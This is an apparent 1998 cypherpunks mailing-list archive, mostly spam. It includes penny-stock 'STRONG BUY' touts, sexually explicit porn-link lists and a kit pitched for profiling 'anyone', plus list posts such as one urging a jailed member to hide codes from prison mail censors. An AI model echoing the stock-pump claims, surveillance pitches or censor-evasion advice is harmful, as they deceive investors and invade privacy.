copy of America's Best Chili Recipes we'll send you an additional 
copy for only $5.00.  That's two copies for only $14.95,  50% off 
the regular price.  

ORDER NOW!!!

All orders received by December 15, 1998 are guaranteed to be 
delivered in time for Christmas.  You can also have us mail your 
gift to your friend or relative for you.

Please use the form below :

=============================================================
ORDER FORM

Yes, I'd like to own my own copy of America's Best Chili Recipes. 
I have filled out this form to help expedite my order:

Please check-off your order:

____ One Copy of America's Best Chili Recipes for $9.95 
     (A savings of $5.00)

____ Two Copies of America's Best Chili Recipes for $14.95 
     (A savings of $14.95)


Name:

Address:

City:

State:

Zip:

E-mail Address:
(For order confirmation)


Please send payment to:

America's Best Recipes
12762 Brookhurst St. Suite 438-B
Garden Grove, CA 92840
(714) 375-5458


 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stockmarketupdate1998iktrmjy@mci.com
Date: Sun, 15 Nov 1998 23:51:16 -0800 (PST)
To: hsmartinvestor@aol.com
Subject: RE: MAJOR "BUY" ALERT
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Internet Stock Market Resources
Symbol:  I S M R
Price:   1 3/4  ($1.75/share)

The venerated German brokerage house, Bentegestgautgen
Financials has issued a "STRONG BUY" on I S M R
with a target price of  $8.50.

I S M R is the leader of financial on-line information
and is currently profitable.  I S M R has a public float of only
300,000 shares.  For more information on I S M R go to: 
http://quicken.excite.com/investments/quotes/






ctl.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MON NOV 16 <stuffed@stuffed.net>
Date: Mon, 16 Nov 1998 01:19:09 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981116081001.19480.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ BUTT NAKED BABES
+ WET CUMSHOTS & WILD HARDCORE
+ ADULT INTERNET XXX
+ INTERNET AFFAIRS
+ ADULT ARTWORK OF ARTISTS
+ A SEXY GIRL
+ FREE HARDCORE PORN
+ ASIAN XXX NYMPHO
+ FREE PORN 4 ALL
+ SIBERIAN DAWGY DAWG
+ BONUS PIC 1 -> http://www.stuffed.net/home/15066.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/16154.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/16042.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/20342.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/30693.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: emilhusb@online.no
Date: Mon, 16 Nov 1998 04:52:55 -0800 (PST)
To: YOU@yourplace.com
Subject: Find  Out  Anything  About  Anyone  On  The  Net   !!!!          /"][
Message-ID: <199811161355.OAA16542@dns.commnet.it>
MIME-Version: 1.0
Content-Type: text/plain



YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $18.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis,  MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $19.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER YOUR COMPLETE MEDIA KIT TODAY !!!!!!!

**********************************************************************
Mail Payment  $19.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!


       YOU MAY ORDER BOTH PACKAGE KITS FOR ONLY $33.00



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION ADVERTISING SERVICES
Offices:  London, Paris, Berlin, Hong Kong






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: par04783@yahoo.com
Date: Fri, 20 Nov 1998 10:18:31 -0800 (PST)
Subject: re your site
Message-ID: <199811201814.KAA07613@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

      For A "One Time Cost" Of Only $39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why businesses both large and small have
 come to us to utilize our services.  Hotels, 
 Motels, On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many, 
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 or Canada or (916) 771-4739 outside the USA
 and we'll provide you with all the necessary
 information to get you submitted Right Away.
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strongintstock4j3s@mci.com
Date: Tue, 17 Nov 1998 06:57:32 -0800 (PST)
To: smarket@snewsletter.net
Subject: RE:  "SIZZLER" INTERNET STOCK!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T D
Price:  2 1/2  ($2.50/share)

QNETD is a provider of global Internet and
Intranet digital networking solutions.  QNETD
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNETD's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNETD is rated an immediate and "STRONG
BUY". 

For more information go to:  http://quote.yahoo.com






gg.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUE NOV 17 <stuffed@stuffed.net>
Date: Tue, 17 Nov 1998 01:20:26 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981117081000.8809.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ CUM SHOT CENTRAL
+ BLOW JOB
+ ALL THE BEAUTY THAT IS WOMAN
+ SMOOTHIE'S PLACE
+ X IN THE BOX
+ BLOW BABY BLOW
+ LESBIAN TWINS
+ CUM GET SOME XXX
+ SEXWAV
+ PORNO CITY
+ BONUS PIC 1 -> http://www.stuffed.net/home/9680.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/27388.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/30178.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/2097.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/26955.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunny@mail.gklub.com
Date: Tue, 17 Nov 1998 14:09:46 -0800 (PST)
Subject: Request
Message-ID: <199811172209.OAA28463@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings!

I am looking for people who are serious about making money in network 
marketing.  I would like to request the chance to send you information 
on the company that I promote.
If you are completely happy where you are right now, then I simply wish 
you the best.Are you really making money? WHAT ABOUT YOUR DOWNLINE?  If 
you are in any way dissatisfied or disappointed with your experience in 
the network marketing industry, please email me back
so I can send you some information that could be the turning point in 
your networking efforts.
If you would like to learn more about a company that is leading this 
industry in the right direction, please send a reply email back 
with"More Info" in the subject line.


God Bless,
Renee



@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Required Sender Information:

Imagetech
Pob 1167
Atlantic Beach, N C 28512
919.493.3898
sunny@mail.gklub.com
Further mailings to you may be stopped at no cost to you by 
sending a reply with REMOVE  as the subj
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nsman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Tue, 17 Nov 1998 05:01:08 -0800 (PST)
To: F-Secure-Press-Global@DataFellows.com
Subject: MEDIA RELEASE: Data Fellows and Nokia Announce New OEM Agreement
Message-ID: <3.0.32.19981117145845.00b6d100@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain


Media Release			For immediate release

Data Fellows and Nokia Announce New OEM Agreement

Data Fellows' F-Secure SSH Client and Server To be Bundled in Three Nokia
Router Product Lines 

Espoo, Finland, November 12, 1998 -- Data Fellows, the global leader in
data security software and Nokia have signed OEM bundling agreement. Under
the terms of the agreement, Nokia will bundle F-Secure SSH Server and
F-Secure SSH Client software in each unit of various Nokia routing
products: the Nokia IP400 family of router/firewall products, the Nokia
VPN200 series, and the Check Point VPN-1 RemoteLink line versions of these
products sold through various VAR (Value Added Reseller) channels. 

F-Secure SSH Client provides Windows, Macintosh and all Unix users with
secure connections over the Internet and other untrusted networks to
corporate resources running F-Secure SSH Server -- in this case, the Nokia
firewall/router products. F-Secure SSH provides proven, ICSA-certified
end-to-end security between the client workstation and the Nokia
router/firewall unit, or any other server running the software. The
software offers strong authentication and encryption based on industry
standard algorithms such as 3DES, IDEA and Blowfish, as well as data
privacy for all data transmission. All data, including the initial user ID
and password, exchanged between the Client and Server flows transparently
through an encrypted tunnel.

The new OEM agreement is the second between Nokia Telecommunications and
Data Fellows. The VPN200 series enables a company of any size to set up
network connections to all plant sites, using maximum-security standards.
Both product families are compatible, enabling simultaneous management and
control.

"F-Secure SSH has become de facto standard for secure remote
administration, maintenance and management of crucial corporate resources
such as firewalls, routers, switches, web servers and mail gateways," says
Petri Laakkonen, president of Data Fellows Inc. "By bundling the software
with leading router/firewall solutions, Nokia and Data Fellows will make
remote maintenance and administration of mission-critical network resources
much more secure, affordable and easier to adapt even to most distributed
global organizations."

"This co-operation will strengthen Nokia's security solutions. Our products
are in use for data applications where security is of the utmost
importance. We are pleased to be able to offer our customers one of the
most advanced, secure range of Firewall systems on the market," says Brian
NeSmith, Vice President, Nokia IPRG.

With offices in San Jose, CA, and Espoo, Finland, privately-owned Data
Fellows is the leading technology provider of data security solutions for
enterprise networks. The company's F-Secure data security product line
includes F-Secure Workstation Suite, consisting of malicious code detection
and removal, unobtrusive file and network encryption, and personal firewall
functionality, all integrated into a policy-based, centralized management
architecture; F-Secure Anti-Virus, with multiple scanning engines
(including F-PROT and AVP), is the most comprehensive, real-time virus
scanning and protection system for all Windows platforms; F-Secure VPN+
provides a software-based, IPSec-compliant Virtual Private Network solution
for large corporate networks as well as remote and small office networks;
F-Secure FileCrypto, the first and only product to integrate strong
real-time encryption directly into the Windows file system; F-Secure SSH,
providing secure remote login, terminal, and other connections over
unsecured networks (it is the most widely used secure remote administration
tool); and F-Secure NameSurfer for remote Internet and Intranet DNS
administration, with an easy-to-use WWW user interface that automates and
simplifies DNS administration.

Nokia is the world's leading mobile phone supplier and a leading supplier
of mobile and fixed telecom networks including related customer services.
Nokia also supplies solutions and products for fixed and wireless datacom,
as well as multimedia terminals and computer monitors. In 1997, net sales
totaled FIM 52.6 billion ($ 9.8 billion). Headquartered in Finland, Nokia
is listed on five European Stock Exchanges and on the New York Stock
Exchange (NOK.A), has sales in 130 countries and employs more than 42,000
people world-wide.

For more information, contact
Data Fellows Inc
Petri Laakkonen
675 North First Street, 8th floor
San Jose, CA 95112
tel 408-938-6700
fax 408-938-6701
Petri.Laakkonen @datafellows.com
http://www.DataFellows.com    or
info@datafellows.com.

Ms Arja Suominen, Vice President, Communications
Nokia Telecommunications 
Tel: (Int.) + 358 9 5113 8193 
Fax: (Int.) + 358 9 5113 8199
http://www.nokia.com
http://www.iprg.nokia.com 
 

--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rbssales@hotmail.com
Date: Tue, 17 Nov 1998 21:13:43 -0800 (PST)
Subject: Your Computer Makes Money While You Sleep
Message-ID: <199811180513.VAA01022@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



        "YOUR COMPUTER CAN MAKE MONEY WHILE YOU SLEEP"
         Respected 10 Year Old Company Shows You How


I know that's an incredible statement, but bear with me while I
explain. Chances are you have already sifted through dozens of
"Get Rich Quick" schemes, chain letter offers, and LOTS of other
absurd scams that promise to make you rich overnight with no
investment and no work.

I'd like to take this opportunity to apologize for all of that.
Some Internet marketers think nothing of cheapening an otherwise
promising medium, which has the effect of casting a shadow over
the credibility of the rest of us. Don't get me started.

Anyway, my offer isn't one of those. What I'm offering is a
straightforward computer-based service that you can run full-or
part-time like a regular business. This service runs auto-
matically while you sleep, vacation, or work a "regular" job.
It provides a valuable new service for businesses in your area.

I'm offering a high-tech, low-maintenance, work-from-anywhere
business that can bring in a nice comfortable additional income
for your family. I did it for eight years. Since I started
inviting others to join me, I've helped over 4000 do the same.

                        901-751-8800
                    http://www.alice.net

I invented it, and it's called a "Remote Backup Service." You
may have read about it in Entrepreneur Magazine, Inc, Home
Office Computing, HomePC, or any of dozens of city newspapers.
I've been written up many times in books, magazines, and news-
papers. I've even spawned a few competitors who's ads you may
have seen on the Internet, and especially on the Web. Don't be
fooled by them. Mine is the first, the one that kicked off the
industry - the REAL DEAL.

It works like this: At night, while you sleep and your clients'
businesses are closed, your computer accepts backup data sent
automatically by the clients' computers. You store this data
for your clients on your computer. Your clients pay you a
monthly service charge plus a per-minute charge for every
minute they are connected to your service and a fee per-
megabyte.

This business might not sound very exciting, but believe me,
it is growing VERY rapidly. It can generate a steadily
increasing, permanent source of reliable, recurring monthly
income for your family that will improve your standard of
living, and WON'T cost a fortune to start or run, ESPECIALLY
if you already have a computer and modem; and I assume you do,
since you received this EMail. It won't take up all your time
- in fact, the service almost runs itself.

I've packaged everything I know about Remote Backup Services -
years of experience, tips and techniques. I've interviewed many
Remote Backup Service providers around the world and included
their advice and methods. I've included advertising and
marketing materials that you can use in your own business,
reviews of pricing structures, and tutorials on technical
subjects.

                   Phone: 901-751-8800
                  http://www.alice.net

(No, you DON'T have to be a computer guru to run an RBS!) I've
included the amazing software I wrote especially to run an RBS,
RBackup. That's just a small sample of what's included in the
"RBS Business Kit."

The RBS Business Kit contains everything you need to start and
operate this revolutionary new work-from-anywhere business,
INCLUDING SOFTWARE, ongoing business and technical support,
and much more. You can start out small, with say, five clients
(average billing about $50 to $100 per month) and move up as
you grow.

Our RBS Business Kits contain everything you need to know to
get started.


* RBackup Remote Backup Software
* Complete Business Operation Manual
* Camera-ready ads and brochures
* Data Loss Risk Evaluation Form
* FREE National Client Referrals
* Marketing Manual
* Ad Kit (electronic version)
* Full-time consulting support
* Subscription to The EchoNet
* Subscription to The RBS News
* A dedicated team of RBS experts
* Presentation-On-A-Disk


How much can you make? Here are some figures: An average client
spends $50 to $100 a month for a Remote Backup Service. Twenty
average clients (a small number) bring in $1000 to $2000 a month.
Many RBS Providers have 60, 100, 300, and more clients. Some
have 600 and more.


                   Phone: 901-751-8800
                   http://www.alice.net


                What Current RBS Providers Say

"Your energy and drive are truly an inspiration to me and I'm
sure to others also. Thanks for sharing your creation with us
so we can all become successful... Keep up the good work!"
C.G., Palos Hills, Il

"I restored my first client today. His PC had crashed due to
a power spike. I reformatted his hard drive and restored his
data from my RBS system. He was up and running in two hours.
The guy was wrapped. Made me feel good too!" - T.V., New
Zealand

"Very few software providers freely disseminate information
regarding future inclusions and upgrades like you do. Even
fewer accept much input regarding potential changes and up-
grades. you listen!" M.K., Tampa, Fl

"I'll be able to quit a 17-year job at the Post Office!
Thanks, Rob!" - R.W., Detroit, Mi.

                             ***

The Dallas Morning News - Aug, 1994 - "This home business
idea is new.. it can be a profitable income producer. Since
it's 'remote,' it doesn't matter where you do it."

                             ***

                    Phone: 901-751-8800
                    http://www.alice.net

The RBS BizKit comes with a 3 month subscription to our
Member's Area, and a subscription to "The RBS Dispatch,"
the monthly Electronic newsletter of the Remote Backup
Service industry.

Best of all, you'll have direct contact with your fellow
RBS Providers worldwide through our extensive internet-
linked EchoNet. Ask questions 24 hours a day. Join in
on-line conferences. Get answers on weekends and holidays.
Bounce new ideas around. Learn from the old timers. Exchange
software, brochures, and other RBS marketing material.
It's GREAT!

You have taken the first step by being kind enough to read
this too-long note. If you are ready to begin your own Remote
Backup Service, place your order now by calling 901-751-8800.
Phones are answered from 9:00AM to 5:00PM Central Time Monday
through Friday. You can also check out our 1800 page interactive
web site at http://www.alice.net

My staff and I are committed to making YOU successful in our
industry. We KNOW how to do it, because we've done it ourselves.
Many of our RBS Providers have 50, 60, 100, 200 and 300 clients
after only a few months in business. You can, too. Let us show
YOU how to make YOUR computer earn money while YOU sleep!

Call us now - 901-751-8800
http://www.alice.net

*******************************************************************


 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED WED NOV 18 <stuffed@stuffed.net>
Date: Wed, 18 Nov 1998 02:18:39 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981118081000.18355.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ BLOWJOB HEAVEN
+ BRIEN'S WORLD XXX
+ ANAL LAND
+ STAR WHORES
+ SEX THINKERS
+ NAKED BLONDES
+ ARNO'S STEAMY WOMEN
+ OBSCENE ORAL CUMSHOTS
+ HOT PICS
+ OBSESSION
+ BONUS PIC 1 -> http://www.stuffed.net/home/4294.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/5854.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/11546.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/16620.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/23217.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security Inc." <Announcements_reply@rpkusa.com>
Date: Wed, 18 Nov 1998 13:23:24 -0800 (PST)
To: Announcements@rpk.com
Subject: ANNOUNCEMENT: RPK SECURITY ADDS NOTED XIONICS EXECUTIVE GARY AMBROSINO TO BOARD OF DIRECTORS
Message-ID: <199811182105.NAA27862@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

----------------------------------------------------------------------------------------------

CONTACT
Paula Miller							Lyn Oswald
Nadel Phelan, Inc.						RPK Security Inc.
408-439-5570 x277						212-488-9891
paulam@nadelphelan.com					lynoswald@rpkusa.com	

FOR IMMEDIATE RELEASE

RPK SECURITY ADDS NOTED XIONICS EXECUTIVE GARY AMBROSINO TO BOARD OF DIRECTORS

San Francisco, California, October 27, 1998 - RPK Security Inc. (www.rpkusa.com), a technology leader in fast public key encryption, today announced that Gary Ambrosino, recent vice president and general manager of Xionics Document Technologies (Nasdaq:XION), will join its Board of Directors. Following a recent round of seed financing, Mr. Ambrosino's addition to the Board is part of RPK's overall strategy to expand its management team.

Prior to joining RPK, Mr. Ambrosino spent five years at Xionics where he led the marketing and early stage sales program for the company's Multifunction Peripherals embedded control technology. Mr. Ambrosino has headed several seed stage technology companies, and spent eight years with Hewlett-Packard.  

"We are pleased to welcome Gary to our Board of Directors," said Jack Oswald, president and CEO of RPK Security. "His experience in driving business development and his extensive industry knowledge will be extremely valuable in the next phase of growth and deployment of our Encryptonite software and FastChip encryption technology into applications like secure remote printing."

"RPK Security has now reached, on schedule, several significant milestones," said Mr. Ambrosino. "These milestones include completion of a very low cost, high-speed encryption chip, the release of the Encryptonite development platform, and continued growth in acceptance of RPK InvisiMail, the world's easiest-to-use secure E-mail add-in."  

RPK's core technology, the patented RPK Encryptonite Engine, is an exceptionally fast public key algorithm for encryption, authentication and digital signatures. It offers a unique combination of the benefits of public key systems and the high performance characteristics of symmetric or "secret key" systems. RPK Encryptonite is available as a software toolkit or a high speed ASIC capable of large key encryption speeds of up to 100 megabits per second.   Applications include streaming video and audio narrowcasting, secure cellular and satellite telephones, and VPN implementation. Developed outside of the U.S., the RPK Encryptonite Engine is available globally with strong encryption, unlike competing products that are restricted by U.S. export regulations.

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key encryption. RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing in San Francisco, CA.  Contact RPK at www.rpkusa.com or (212) 488-9891.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 18 Nov 1998 14:34:03 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: CJ Update
In-Reply-To: <199811181521.KAA16375@smtp2.atl.mindspring.net>
Message-ID: <199811182233.OAA08408@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


the CJ update is sad/interesting.

the story about the psychologist asking him about his tax
resistance or failure to file a return is a big red flag.
that's jim bell's problem. so it looks like a lot of this
is about trying to scare the bejeezus out of people who think
that paying taxes is bogus. notice how the psychologist implied
that not filing taxes or being a tax protester is a sign of
insanity.. well hell I'm sure that's what the english royalty
felt about the colonies at the time!! we have met the enemy,
and the enemy is us!!

CJ complains that letters are not getting to him, or that
his mail is being read. I propose CJ try to set up a secure
conversation with someone and establish a code with the
outside world. being a cpunk with a lot of intelligence
he will understand this  very well.   also you could even
set up codes in which you are not using actual words. but
transmitting something else that the authorities will not
interfere with, but which contains info. for example chess-by-mail
moves could conceal codes. (I heard one rumor they were censored
during WWII)

also ingenious schemes could be used to determine if you are
missing mail. CJ numbers all his letters to the outside world
and uses a single point of contact to send mail to. that person
also numbers all mail sent to CJ. CJ then knows what is not
received. both sides should catalog/inventory what they are sending/receiving.

if CJ is fighting the truth, I don't think he is wise. did he
really plant a bomb?? if so, I think it would be wise to plea
bargain on that one. CJ doesn't realize that they may have far more
knowledge about what they can get him for than he does, and he may
regret not taking a plea bargain down the road. CJ, don't try to 
be a joan-of-arc, or you might get burned at the stake.

sounds like what would be very valuable to CJ right now is a little
law books on the charge relevant to him, and maybe a book like
"defending yourself in court for dummies"
<g>

good luck CJ-- I think you will get out of the hole onto a strict
probation, like Bell..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 18 Nov 1998 17:26:12 -0800 (PST)
To: coderpunks@toad.com
Subject: Re: manners and piracy
Message-ID: <365371F6.2D9A3CB0@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


Bernardo B. Terrado wrote:
> > Could someone give me a copy of statgraphics for dos or windows?
> > I would gladly appreciate it.

and then took issue with somebody obscenely taking him to task for
asking these lists for a pirated version of this software:

> Well I thought this list was a list of intellectuals, not only good in 
> hacks and coding and programming and the likes but also well "tailored"
> with their manners,

Bernardo, this package costs in the neighborhood of $900 US.  What makes
you think the mannered intellectuals you expect to find on these
lists would either condone or contribute to software piracy on this
scale?  Or that they would not take violent verbal objection to the
suggestion that they would do so?

Take your piracy requests elsewhere.  These aren't warez lists.
-- 
	Jim Gillogly
	29 Blotmath S.R. 1998, 01:12
	12.19.5.12.12, 4 Eb 5 Ceh, Ninth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C" <pleontks@hotmail.com>
Date: Wed, 18 Nov 1998 18:59:54 -0800 (PST)
To: jacket9@primenet.com
Subject: Fwd: Re: Snowball fight '98 - '99
Message-ID: <19981119025920.3377.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



> GOTCHA!!!
> >                         \     |     /
> >                     \\      \  | |  /     //
> >                        \\\   \\     //  ///
> >                          \\\ ####### ///
> >                        \\##           ##//
> >                    --   ##             ##   --
> >                     --  ##   squish!!  ## --
> >                        //##           ##\\
> >                      //   ###       ###   \\
> >                         ///  ####### \\\
> >                       ///   //     \\  \\\
> >                     //      /  | |  \     \\
> >                           /     |     \
> >
> >          You have just been hit with a snow ball!
> >           >           It's the start of.....
> >           Snow Ball Fight '98/'99!!!!
> >
> >          One rule to this game....
> >          You can't hit someone who has already hit you!
> >           Now...go out there and hit as many people
> >           as you can before they get you!!
> 


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED THU NOV 19 <stuffed@stuffed.net>
Date: Thu, 19 Nov 1998 01:29:13 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: STUFFED NOW HAS LINKS TO 100S MORE PHOTOS!
Message-ID: <19981119081000.5781.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


CHECK OUT ALL THE NEW STUFF IN STUFFED!

+ BIG PUSSY HEAVEN
+ GOOEY GONADS
+ ORAL XXX
+ FREE PORN 4 ALL
+ EABO'S EBONY ECSTACY
+ XXX SOFTLY
+ MAD MAX'S ULTIMATE BABES
+ ASIAN SLUTS
+ INTO THE NIGHT
+ NICE BUTTS
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 18 Nov 1998 16:54:10 -0800 (PST)
To: Adam Hupp <ashupp@students.wisc.edu>
Subject: manners....
In-Reply-To: <3653653A.1FD92C2B@students.wisc.edu>
Message-ID: <Pine.GSO.3.96.981119084623.23603A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


> Bernardo B. Terrado wrote:
> > 
